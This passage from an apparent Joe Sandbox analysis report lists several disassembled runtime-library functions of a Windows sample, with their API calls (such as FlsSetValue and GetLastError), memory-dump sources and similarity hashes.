                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: new[]
                                                                                                                                                                                                                              • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                                                              • API String ID: 4059295235-3840279414
                                                                                                                                                                                                                              • Opcode ID: bb63b660b28564e2b4f56d70e8d4805a2ad26e5cdeba8f4d134ad6f1fd5ea73c
                                                                                                                                                                                                                              • Instruction ID: b997a95bf1eb49ce10549b9311fd90eca5ed69bc6d3a4ca9465d8afa41fdf4b5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb63b660b28564e2b4f56d70e8d4805a2ad26e5cdeba8f4d134ad6f1fd5ea73c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C51E1D2B0D38345FB65AB71E919E7A6795AF48B84F080536EE4D07792DF3CE4458300
                                                                                                                                                                                                                              Function 00007FFB0C7CB5BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,00007FFB0C7C9ED1,?,?,?,?,00007FFB0C7C4CC7), ref: 00007FFB0C7CB5CB
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,00000000,00007FFB0C7C9ED1,?,?,?,?,00007FFB0C7C4CC7), ref: 00007FFB0C7CB601
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,00000000,00007FFB0C7C9ED1,?,?,?,?,00007FFB0C7C4CC7), ref: 00007FFB0C7CB62E
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,00000000,00007FFB0C7C9ED1,?,?,?,?,00007FFB0C7C4CC7), ref: 00007FFB0C7CB63F
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,00000000,00007FFB0C7C9ED1,?,?,?,?,00007FFB0C7C4CC7), ref: 00007FFB0C7CB650
                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,00000000,00007FFB0C7C9ED1,?,?,?,?,00007FFB0C7C4CC7), ref: 00007FFB0C7CB66B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: c2988470996c8379b0b8b9b622bd793b46203877286ea0b4af43dca60023248b
                                                                                                                                                                                                                              • Instruction ID: 607c7413da68e9bd686e6a6d429f17b679e85c23af64068e38b0653c1d50868a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2988470996c8379b0b8b9b622bd793b46203877286ea0b4af43dca60023248b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D111DE0B0964343FA586772E9DAD3962A69F487F0F144739F92E176E7DF2CE8414204
                                                                                                                                                                                                                              Function 00007FFB0C7C8B40 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: b279a170408d618237bddf6b9ec99c878b24dd9d163caff4e822d6b1485b2f82
                                                                                                                                                                                                                              • Instruction ID: be473ea484c460a6de54578fea2f192594f04f26b95cdfafc8e4ed442a789c20
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b279a170408d618237bddf6b9ec99c878b24dd9d163caff4e822d6b1485b2f82
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 271170E2E1CB0705F6941978E9CEBBA10406F653F0F18063DFA6F0A6DB8F5CA840C246
                                                                                                                                                                                                                              Function 00007FFB0C7CB684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FFB0C7C9A4F,?,?,00000000,00007FFB0C7C9CEA,?,?,?,?,00000000,00007FFB0C7C9C76), ref: 00007FFB0C7CB6A3
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FFB0C7C9A4F,?,?,00000000,00007FFB0C7C9CEA,?,?,?,?,00000000,00007FFB0C7C9C76), ref: 00007FFB0C7CB6C2
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FFB0C7C9A4F,?,?,00000000,00007FFB0C7C9CEA,?,?,?,?,00000000,00007FFB0C7C9C76), ref: 00007FFB0C7CB6EA
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FFB0C7C9A4F,?,?,00000000,00007FFB0C7C9CEA,?,?,?,?,00000000,00007FFB0C7C9C76), ref: 00007FFB0C7CB6FB
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FFB0C7C9A4F,?,?,00000000,00007FFB0C7C9CEA,?,?,?,?,00000000,00007FFB0C7C9C76), ref: 00007FFB0C7CB70C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 1fa3851199622a7c069eb38baa46772d1902b3df2f6502d9db3f6eee4f8e80ff
                                                                                                                                                                                                                              • Instruction ID: 7c4105f5045f86e396f8cd0785518e6af11f2dcaf43016ba7bd29f6fe3748b1b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fa3851199622a7c069eb38baa46772d1902b3df2f6502d9db3f6eee4f8e80ff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06113AE0A0824343FA586735E9DAD7962969F847E0F14533DFD7D1A6E7EF2CE8118204